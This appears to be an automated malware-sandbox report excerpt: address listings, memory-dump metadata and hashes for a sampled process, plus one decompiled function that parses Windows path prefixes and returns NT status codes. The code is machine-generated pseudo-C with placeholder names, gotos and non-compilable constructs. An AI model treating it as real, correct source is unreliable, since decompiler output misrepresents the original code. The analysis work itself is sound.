                                                    0x00b55ce1
                                                    0x00b55ce4
                                                    0x00b55ce7
                                                    0x00b55ced
                                                    0x00b55cf3
                                                    0x00b55cf9
                                                    0x00b55cff
                                                    0x00b55d08
                                                    0x00b55d0a
                                                    0x00b55d0e
                                                    0x00b55d10
                                                    0x00000000
                                                    0x00000000
                                                    0x00b55d16
                                                    0x00b55d1a
                                                    0x00000000
                                                    0x00000000
                                                    0x00b55d20
                                                    0x00b55d22
                                                    0x00b55d25
                                                    0x00b55d2f
                                                    0x00b55d2f
                                                    0x00b55d33
                                                    0x00b55d3d
                                                    0x00b55d49
                                                    0x00b55d4b
                                                    0x00000000
                                                    0x00000000
                                                    0x00b55d5a
                                                    0x00b55d5d
                                                    0x00b55d60
                                                    0x00000000
                                                    0x00000000
                                                    0x00b55d66
                                                    0x00b55d69
                                                    0x00000000
                                                    0x00000000
                                                    0x00b55d6f
                                                    0x00b55d6f
                                                    0x00b55d73
                                                    0x00b55d79
                                                    0x00b55d7f
                                                    0x00b55d86
                                                    0x00b55d95
                                                    0x00b55d98
                                                    0x00b55dba
                                                    0x00b55dcb
                                                    0x00b55dce
                                                    0x00b55dd3
                                                    0x00b55dd6
                                                    0x00b55dd8
                                                    0x00b55de6
                                                    0x00b55dec
                                                    0x00b55dee
                                                    0x00b55df1
                                                    0x00b55df3
                                                    0x00b5635a
                                                    0x00b5635a
                                                    0x00000000
                                                    0x00b5635a
                                                    0x00b55dfe
                                                    0x00b55e02
                                                    0x00b55e05
                                                    0x00b55e07
                                                    0x00b55e10
                                                    0x00b55e13
                                                    0x00b55e1b
                                                    0x00b55e1c
                                                    0x00b55e21
                                                    0x00b55e22
                                                    0x00b55e23
                                                    0x00b55e25
                                                    0x00b55e2a
                                                    0x00b55e2c
                                                    0x00b55e2e
                                                    0x00b55e36
                                                    0x00b55e39
                                                    0x00b55e42
                                                    0x00b55e47
                                                    0x00b55e4d
                                                    0x00b55e54
                                                    0x00b55e54
                                                    0x00b55e54
                                                    0x00b55e2e
                                                    0x00b55e5c
                                                    0x00b55e5f
                                                    0x00b55e62
                                                    0x00b55e64
                                                    0x00b55e6b
                                                    0x00b55e70
                                                    0x00b55e7a
                                                    0x00b55e7a
                                                    0x00b55e7a
                                                    0x00b55e6b
                                                    0x00b55e7e
                                                    0x00b55e7f
                                                    0x00b55e7f
                                                    0x00b55e81
                                                    0x00b55e87
                                                    0x00b55e8b
                                                    0x00b55e8c
                                                    0x00b55e8c
                                                    0x00b55e8c
                                                    0x00b55e9a
                                                    0x00b55e9c
                                                    0x00b55ea2
                                                    0x00b55ea6
                                                    0x00b55f50
                                                    0x00b55f50
                                                    0x00b55f57
                                                    0x00b55f66
                                                    0x00b55f66
                                                    0x00b55f66
                                                    0x00b55f68
                                                    0x00b55f6a
                                                    0x00b563d0
                                                    0x00000000
                                                    0x00b55f70
                                                    0x00b55f70
                                                    0x00b55f91
                                                    0x00b55f9c
                                                    0x00b55f9e
                                                    0x00b55fa4
                                                    0x00b55fa6
                                                    0x00b5638c
                                                    0x00b56392
                                                    0x00b563a1
                                                    0x00b563a7
                                                    0x00b563af
                                                    0x00b563af
                                                    0x00b563bd
                                                    0x00b563d8
                                                    0x00000000
                                                    0x00b563d8
                                                    0x00b55fac
                                                    0x00b55fb2
                                                    0x00b55fb4
                                                    0x00b55fbd
                                                    0x00b55fc6
                                                    0x00b55fce
                                                    0x00b55fd4
                                                    0x00b55fdc
                                                    0x00b55fec
                                                    0x00b55fed
                                                    0x00b55fee
                                                    0x00b55fef
                                                    0x00b55ff9
                                                    0x00b55ffa
                                                    0x00b55ffb
                                                    0x00b55ffc
                                                    0x00b56000
                                                    0x00b56004
                                                    0x00b56012
                                                    0x00b56012
                                                    0x00b56018
                                                    0x00b56019
                                                    0x00b5601a
                                                    0x00b5601b
                                                    0x00b5601c
                                                    0x00b56020
                                                    0x00b56059
                                                    0x00b5605c
                                                    0x00b56061
                                                    0x00b56061
                                                    0x00b56022
                                                    0x00b56022
                                                    0x00b56022
                                                    0x00b56025
                                                    0x00b5602a
                                                    0x00b5602b
                                                    0x00b56031
                                                    0x00b56037
                                                    0x00b56038
                                                    0x00b5603e
                                                    0x00b56048
                                                    0x00b56049
                                                    0x00b5604a
                                                    0x00b5604b
                                                    0x00b5604c
                                                    0x00b5604d
                                                    0x00b56053
                                                    0x00b56054
                                                    0x00b56054
                                                    0x00b56062
                                                    0x00b56065
                                                    0x00b56067
                                                    0x00b5606a
                                                    0x00b56070
                                                    0x00b56075
                                                    0x00b56076
                                                    0x00b56081
                                                    0x00b56087
                                                    0x00b56095
                                                    0x00b56099
                                                    0x00b5609e
                                                    0x00b560a4
                                                    0x00b560ae
                                                    0x00b560b0
                                                    0x00b560b3
                                                    0x00b560b6
                                                    0x00b560b8
                                                    0x00b560ba
                                                    0x00b560ba
                                                    0x00b560ba
                                                    0x00b560ba
                                                    0x00b560be
                                                    0x00b560c0
                                                    0x00b560c5
                                                    0x00b560c5
                                                    0x00b560c5
                                                    0x00b560c6
                                                    0x00b560cd
                                                    0x00b56114
                                                    0x00b560cf
                                                    0x00b560cf
                                                    0x00b560d4
                                                    0x00b560d5
                                                    0x00b560da
                                                    0x00b560db
                                                    0x00b560e1
                                                    0x00b560e2
                                                    0x00b560e8
                                                    0x00b560f8
                                                    0x00b560fd
                                                    0x00b560fe
                                                    0x00b56102
                                                    0x00b56104
                                                    0x00b56107
                                                    0x00b56109
                                                    0x00b5610b
                                                    0x00b5610b
                                                    0x00b5610b
                                                    0x00b5610b
                                                    0x00b5610f
                                                    0x00b5610f
                                                    0x00b56117
                                                    0x00b5611a
                                                    0x00b5611f
                                                    0x00b56125
                                                    0x00b56134
                                                    0x00b56139
                                                    0x00b5613f
                                                    0x00b56146
                                                    0x00b56148
                                                    0x00b5614b
                                                    0x00b5614d
                                                    0x00b5614f
                                                    0x00b5614f
                                                    0x00b5614f
                                                    0x00b5614f
                                                    0x00b56153
                                                    0x00b56159
                                                    0x00b56159
                                                    0x00b5615c
                                                    0x00b56163
                                                    0x00b56169
                                                    0x00b5616c
                                                    0x00b56172
                                                    0x00b56181
                                                    0x00b56186
                                                    0x00b56187
                                                    0x00b5618b
                                                    0x00b56191
                                                    0x00b56195
                                                    0x00b561a3
                                                    0x00b561bb
                                                    0x00b561c0
                                                    0x00b561c3
                                                    0x00b561cc
                                                    0x00b561d0
                                                    0x00b561dc
                                                    0x00b561de
                                                    0x00b561e1
                                                    0x00b561e4
                                                    0x00b561e6
                                                    0x00b561e8
                                                    0x00b561e8
                                                    0x00b561e8
                                                    0x00b561e8
                                                    0x00b561e6
                                                    0x00b561ec
                                                    0x00b561f3
                                                    0x00b56203
                                                    0x00b56209
                                                    0x00b5620a
                                                    0x00b56216
                                                    0x00b5621d
                                                    0x00b56227
                                                    0x00b56241
                                                    0x00b56246
                                                    0x00b5624c
                                                    0x00b56257
                                                    0x00b56259
                                                    0x00b5625c
                                                    0x00b5625e
                                                    0x00b56260
                                                    0x00b56260
                                                    0x00b56260
                                                    0x00b56260
                                                    0x00b5625e
                                                    0x00b56264
                                                    0x00b56267
                                                    0x00b56269
                                                    0x00b56315
                                                    0x00b56315
                                                    0x00b5631b
                                                    0x00b5631e
                                                    0x00b56324
                                                    0x00b56327
                                                    0x00b5632f
                                                    0x00b56330
                                                    0x00b56333
                                                    0x00b5633a
                                                    0x00b5633c
                                                    0x00b56335
                                                    0x00b56335
                                                    0x00b56335
                                                    0x00b5633f
                                                    0x00b56342
                                                    0x00b5634c
                                                    0x00b56352
                                                    0x00b56355
                                                    0x00b56355
                                                    0x00b56359
                                                    0x00000000
                                                    0x00b5626f
                                                    0x00b56275
                                                    0x00b56275
                                                    0x00b56278
                                                    0x00b5627e
                                                    0x00b5627e
                                                    0x00b56281
                                                    0x00b56287
                                                    0x00b5628d
                                                    0x00b56298
                                                    0x00b5629c
                                                    0x00b562a2
                                                    0x00b5629e
                                                    0x00b5629e
                                                    0x00b5629e
                                                    0x00b562a7
                                                    0x00b562a7
                                                    0x00b562aa
                                                    0x00b562b0
                                                    0x00b562f0
                                                    0x00b562f0
                                                    0x00b562f2
                                                    0x00b562f8
                                                    0x00b562fd
                                                    0x00b562b2
                                                    0x00b562b2
                                                    0x00b562b2
                                                    0x00b562b5
                                                    0x00b562dd
                                                    0x00b562e2
                                                    0x00b562e5
                                                    0x00b562b7
                                                    0x00b562b8
                                                    0x00b562bb
                                                    0x00b562bd
                                                    0x00b562c0
                                                    0x00b562c4
                                                    0x00b562cd
                                                    0x00b562cd
                                                    0x00b562c0
                                                    0x00b562bb
                                                    0x00b562b5
                                                    0x00b56302
                                                    0x00b56303
                                                    0x00b56305
                                                    0x00b56305
                                                    0x00b56305
                                                    0x00b5630c
                                                    0x00b5630c
                                                    0x00000000
                                                    0x00b5627e
                                                    0x00b56269
                                                    0x00b55eac
                                                    0x00b55ebb
                                                    0x00b55ebe
                                                    0x00b55ecb
                                                    0x00b55ecb
                                                    0x00b55ece
                                                    0x00b55ece
                                                    0x00b55ed4
                                                    0x00b55ed7
                                                    0x00b55ed9
                                                    0x00b55edb
                                                    0x00b55edb
                                                    0x00b55ee1
                                                    0x00b55ee1
                                                    0x00b55ee3
                                                    0x00b55f20
                                                    0x00b55f20
                                                    0x00b55ee5
                                                    0x00b55ee5
                                                    0x00b55ee5
                                                    0x00b55ee8
                                                    0x00b55f11
                                                    0x00b55f18
                                                    0x00b55eea
                                                    0x00b55eea
                                                    0x00b55eed
                                                    0x00b55ef2
                                                    0x00b55ef8
                                                    0x00b55efb
                                                    0x00b55f0a
                                                    0x00b55f0a
                                                    0x00b55eed
                                                    0x00b55ee8
                                                    0x00b55f22
                                                    0x00b55f28
                                                    0x00000000
                                                    0x00000000
                                                    0x00b55f30
                                                    0x00b55f31
                                                    0x00b55f37
                                                    0x00b55f3a
                                                    0x00b55f3d
                                                    0x00b55f44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b55f46
                                                    0x00b55f48
                                                    0x00b55f4d
                                                    0x00000000
                                                    0x00b55f4d
                                                    0x00b55dda
                                                    0x00b55ddf
                                                    0x00000000
                                                    0x00b55ddf
                                                    0x00b55dd8
                                                    0x00b55da7
                                                    0x00b55da9
                                                    0x00b55dac
                                                    0x00b55dae
                                                    0x00000000
                                                    0x00b55db4
                                                    0x00b55db4
                                                    0x00000000
                                                    0x00b55db4
                                                    0x00b55dae
                                                    0x00b55d88
                                                    0x00b55d8d
                                                    0x00b56363
                                                    0x00b56369
                                                    0x00b5636a
                                                    0x00b56370
                                                    0x00b56372
                                                    0x00b5637a
                                                    0x00b5637b
                                                    0x00b5637d
                                                    0x00000000
                                                    0x00000000
                                                    0x00b5637f
                                                    0x00b56385
                                                    0x00000000
                                                    0x00b56385
                                                    0x00b55d38
                                                    0x00b55d3b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b55d3b
                                                    0x00b55d27
                                                    0x00b55d29
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b56360
                                                    0x00000000
                                                    0x00b56360
                                                    0x00b55c10
                                                    0x00b55c10
                                                    0x00b563da
                                                    0x00b563e5
                                                    0x00b563e5

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4fee3702e3bbe0546ea062259f7290db72c68bbcb153ca8b0d254fd7830d8914
                                                    • Instruction ID: fd16fa0d8bf575777c1cead6933ec7ae5fa8247e56c144d0fa881aa6a177af30
                                                    • Opcode Fuzzy Hash: 4fee3702e3bbe0546ea062259f7290db72c68bbcb153ca8b0d254fd7830d8914
                                                    • Instruction Fuzzy Hash: E5425871900629CFDB24CF68C881BA9B7F1FF49305F5581EAD94DAB242E7349A89CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AA4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E00AA4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0xb7d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E00ABF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E00AA6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L00AA4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E00AA6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M00AA45F8))) {
												case 0:
													_v568 = 0xa61078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0xa611c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L00AA4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E00ACF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E00ACF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E00A852A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E00A9EB70(1, 0xb779a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E00A9AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E00AC95D0();
																			L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E00ACB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E00AC3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E00ACB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                    0x00aa4128
                                                    0x00aa4135
                                                    0x00aa413c
                                                    0x00aa4141
                                                    0x00aa4145
                                                    0x00aa4147
                                                    0x00aa414e
                                                    0x00aa4151
                                                    0x00aa4159
                                                    0x00aa415c
                                                    0x00aa4160
                                                    0x00aa4164
                                                    0x00aa4168
                                                    0x00aa416c
                                                    0x00aa417f
                                                    0x00aa4181
                                                    0x00aa446a
                                                    0x00aa446a
                                                    0x00aa418c
                                                    0x00aa4195
                                                    0x00aa4199
                                                    0x00aa4432
                                                    0x00aa4439
                                                    0x00aa443d
                                                    0x00aa4442
                                                    0x00aa4447
                                                    0x00000000
                                                    0x00aa419f
                                                    0x00aa41a3
                                                    0x00aa41b1
                                                    0x00aa41b9
                                                    0x00aa41bd
                                                    0x00aa45db
                                                    0x00aa45db
                                                    0x00000000
                                                    0x00aa41c3
                                                    0x00aa41c3
                                                    0x00aa41ce
                                                    0x00aa41d4
                                                    0x00aee138
                                                    0x00aee13e
                                                    0x00aee169
                                                    0x00aee16d
                                                    0x00aee19e
                                                    0x00aee16f
                                                    0x00aee16f
                                                    0x00aee175
                                                    0x00aee179
                                                    0x00aee18f
                                                    0x00aee193
                                                    0x00000000
                                                    0x00aee199
                                                    0x00000000
                                                    0x00aee199
                                                    0x00aee193
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aa41da
                                                    0x00aa41da
                                                    0x00aa41df
                                                    0x00aa41e4
                                                    0x00aa41ec
                                                    0x00aa4203
                                                    0x00aa4207
                                                    0x00aee1fd
                                                    0x00aa4222
                                                    0x00aa4226
                                                    0x00aee1f3
                                                    0x00aee1f3
                                                    0x00aa422c
                                                    0x00aa422c
                                                    0x00aa4233
                                                    0x00aee1ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aa4239
                                                    0x00aa4239
                                                    0x00aa4239
                                                    0x00aa4239
                                                    0x00aa4233
                                                    0x00aa4226
                                                    0x00aa41ee
                                                    0x00aa41ee
                                                    0x00aa41f4
                                                    0x00aa4575
                                                    0x00aee1b1
                                                    0x00aee1b1
                                                    0x00000000
                                                    0x00aa457b
                                                    0x00aa457b
                                                    0x00aa4582
                                                    0x00aee1ab
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aa4588
                                                    0x00aa4588
                                                    0x00aa458c
                                                    0x00aee1c4
                                                    0x00aee1c4
                                                    0x00000000
                                                    0x00aa4592
                                                    0x00aa4592
                                                    0x00aa4599
                                                    0x00aee1be
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aa459f
                                                    0x00aa459f
                                                    0x00aa45a3
                                                    0x00aee1d7
                                                    0x00aee1e4
                                                    0x00000000
                                                    0x00aa45a9
                                                    0x00aa45a9
                                                    0x00aa45b0
                                                    0x00aee1d1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aa45b6
                                                    0x00aa45b6
                                                    0x00aa45b6
                                                    0x00000000
                                                    0x00aa45b6
                                                    0x00aa45b0
                                                    0x00aa45a3
                                                    0x00aa4599
                                                    0x00aa458c
                                                    0x00aa4582
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aa41f4
                                                    0x00aa423e
                                                    0x00aa4241
                                                    0x00aa45c0
                                                    0x00aa45c4
                                                    0x00000000
                                                    0x00aa45ca
                                                    0x00aa45ca
                                                    0x00000000
                                                    0x00aee207
                                                    0x00aee20f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aa45d1
                                                    0x00000000
                                                    0x00000000
                                                    0x00aa45ca
                                                    0x00000000
                                                    0x00aa4247
                                                    0x00aa4247
                                                    0x00aa4247
                                                    0x00aa4249
                                                    0x00aa4249
                                                    0x00aa4249
                                                    0x00aa4251
                                                    0x00aa4251
                                                    0x00aa4257
                                                    0x00aa425f
                                                    0x00aa426e
                                                    0x00aa4270
                                                    0x00aa427a
                                                    0x00aee219
                                                    0x00aee219
                                                    0x00aa4280
                                                    0x00aa4282
                                                    0x00aa4456
                                                    0x00aa45ea
                                                    0x00000000
                                                    0x00aa45f0
                                                    0x00aee223
                                                    0x00000000
                                                    0x00aee223
                                                    0x00aa445c
                                                    0x00aa445c
                                                    0x00000000
                                                    0x00aa445c
                                                    0x00000000
                                                    0x00aa4288
                                                    0x00aa428c
                                                    0x00aee298
                                                    0x00aa4292
                                                    0x00aa4292
                                                    0x00aa429e
                                                    0x00aa42a3
                                                    0x00aa42a7
                                                    0x00aa42ac
                                                    0x00aee22d
                                                    0x00aa42b2
                                                    0x00aa42b2
                                                    0x00aa42b9
                                                    0x00aa42bc
                                                    0x00aa42c2
                                                    0x00aa42ca
                                                    0x00aa42cd
                                                    0x00aa42cd
                                                    0x00aa42d4
                                                    0x00aa433f
                                                    0x00aa433f
                                                    0x00aa42d6
                                                    0x00aa42d6
                                                    0x00aa42d9
                                                    0x00aa42dd
                                                    0x00aa42eb
                                                    0x00aee23a
                                                    0x00aa42f1
                                                    0x00aa4305
                                                    0x00aa430d
                                                    0x00aa4315
                                                    0x00aa4318
                                                    0x00aa431f
                                                    0x00aa4322
                                                    0x00aa432e
                                                    0x00aa433b
                                                    0x00aa433b
                                                    0x00000000
                                                    0x00aa432e
                                                    0x00aa42eb
                                                    0x00aa434c
                                                    0x00aa434e
                                                    0x00aa4352
                                                    0x00aa4359
                                                    0x00aa435e
                                                    0x00aa4361
                                                    0x00aa436e
                                                    0x00aa438a
                                                    0x00aa438e
                                                    0x00aa4396
                                                    0x00aa439e
                                                    0x00aa43a1
                                                    0x00aa43ad
                                                    0x00aa43bb
                                                    0x00aa43bb
                                                    0x00aa43ad
                                                    0x00aa436e
                                                    0x00aa43bf
                                                    0x00aa43c5
                                                    0x00aa4463
                                                    0x00aa4463
                                                    0x00aa43ce
                                                    0x00aa43d5
                                                    0x00aa43d9
                                                    0x00aa43df
                                                    0x00aa4475
                                                    0x00aa4479
                                                    0x00aa4491
                                                    0x00aa4491
                                                    0x00aa4479
                                                    0x00aa43e5
                                                    0x00aa43eb
                                                    0x00aa43f4
                                                    0x00aa43f6
                                                    0x00aa43f9
                                                    0x00aa43fc
                                                    0x00aa43ff
                                                    0x00aa44e8
                                                    0x00aa44ed
                                                    0x00aa44f3
                                                    0x00aee247
                                                    0x00000000
                                                    0x00aa44f9
                                                    0x00aa4504
                                                    0x00aa4508
                                                    0x00aa450f
                                                    0x00aee269
                                                    0x00000000
                                                    0x00aa4515
                                                    0x00aa4519
                                                    0x00aa4531
                                                    0x00aa4534
